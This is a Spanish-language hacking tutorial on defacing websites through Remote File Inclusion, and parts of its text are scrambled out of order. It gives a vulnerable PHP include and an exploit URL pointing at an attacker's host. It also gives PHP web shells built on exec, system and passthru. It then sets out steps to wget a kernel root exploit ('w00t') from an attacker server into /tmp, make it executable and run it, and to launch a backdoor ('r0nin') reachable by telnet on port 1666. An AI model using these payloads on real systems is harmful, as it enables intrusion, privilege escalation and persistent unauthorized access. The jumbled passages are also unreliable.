You are on page 1of 4

################################################################################ ######## ##### # # # ## # # ## # # # # ##### # # #### # ##### ### # # # # # # # # # # # # #### # #### #### # # ### # # #### # #### ##### #####

# # # #### # # # # # # ### # ## # #

# # ## # # # # #

##### # # # # # # #####

# #### #

##### #

################################################################################ ######## * Defacing 3 - Remote File Inclusion * www.digital-system.org - csuser.x[at]gmail[dot]com ################################################################################ ######## Remote File Inclusion La famosa técnica RFI. Esta vulnerabilidad permite incluir archivos remotos de otr os servidores, la mayoría de estas vulnerabilidades se encuentran en códigos como: ******************** <? include"$page"; ?> ******************** Este seria explotado de esta manera: ******************************** vuln.php?page=http//[atacante] ******************************** Pero ¿A qué pagina enviamos este archivo? Lo mas normal es enviarlo a uno para poder ejecutar comandos, el archivo podría tener cualquiera de estos: **************************************************** <? exec($_GET[cmd],$salida); foreach($salida as $line) { echo "$line<br>"; } ?> exec(); *******

ls" *************************************************** Pues aun no esta lo mejor porque aun así sino tenemos permisos podemos obtenerlos por medio de xploits.gif debe haber uno de esos 3 códigos de arriba. foreach($salida as $line) { echo "$line<br>". } ?> system(). Podemos ver como estamos incluyendo nuestro archivo. A continuación se explicará como utilizarlos.gif?cmd=id. por ejemplo: *************************************************** ---> "cd/home/fulanito/public_html. Lo subimos al server y l o tenemos todo preparado.xpl.cat config. como por ejemplo comandos como "cat" para ver archivos como l os de configuración en texto plano. cada uno usa una variante distinta ya que algunos servidores puede que alguna la tenga bloqueada para que no hagan tonterías . ¿Qué podemos hacer con esto? Pues muchas cosas.php" O para conseguir una lista de archivos: ---> "cd/home/fulanito/public_html..gif .. inyectamos un código php y ha ciendo que lo ejecute.gif.com/vuln.$salida).<? system($_GET[cmd].com/xpl. ---> http://victima.com/xpl. y así obtener información también podemos hacer cat en los archivos de otros usuarios.jpg cual s ea mientras no sea php sino lo ejecutaría en nuestro server. imaginemos que el url es http://atacante..gif?cmd=[aquí el comando] Allí va el comando a ejecutar. ***************************************************** Bien ya tenemos el archivo con este código le ponemos una extensión . en xpl. } ?> passthru(). foreach($salida as $line) { echo "$line<br>". Ahora hacemos un url así. ******* <? passthru($_GET[cmd].$salida). Entonces haríamos . EXPLOIT w00t . como una shell.php?page=http://atacante.

5º Bien ahora el backdoor esta ejecutado para entrar entraremos por telnet en el puerto 1666.csuser.OK.../r0nin) 4º Si funciona bien veremos algo como: PsychoPhobia Backdoor is starting.org . 1º Descargaremos w00t./w00t)6 6º Ahora para saber si funciono escribiremos "id" y nos saldrá nuestro id. EXPLOIT r0nin También podemos ejecutar un backdoor en el server para poder entrar con una shell aunque sea como nobody pero nos puede ser muy útil.4 e l exploit se llama w00t. nos debe rá dar otro que no sea el de nobody con este no somos root pero tenemos bastantes permi sos. 2º Iremos a la carpeta /tmp hay podemos ejecutar exploits desde nobody (cd/tmp) 3º Subiremos el w00t al server por medio de wget para esto subí el archivo w00t a t u server y ejecutamos lo siguiente dentro la carpeta tmp: **************************** "wget http://atacante/w00t" **************************** Esto recogerá el archivo w00t de tu server y lo pasara a la carpeta en la que estés (/tmp) 4º Lo que haremos ahora será dar permisos chmod 777 a w00t para poder ejecutarlo (chmod -c 777 w00t) 5º Ahora lo ejecutaremos (.digital-system.Podemos rootear la maquina con un xploit que aprovecha un bug en el kernel 2.x[at]gmail[dot]com ################################################################################ . También podemos usar el PuTTy para esto. Aquí encontramos una shell como nobody o co mo lo hayamos ejecutado. Este xploit se llama r0nin como en la explicación anterior haremos lo mismo: 1º Descargaremos el xploit r0nin 2º Lo subiremos a la carpeta /tmp y le daremos permisos chmod 777 (explicado ante riormente) 3º Hay le ejecutaremos (. [Editado por Digital SYstem] * www. ################################################################################ ######## * Texto recopilado de la Red. (en la xxxx saldrá unos números que es el pid). pi d = xxxx.

######## .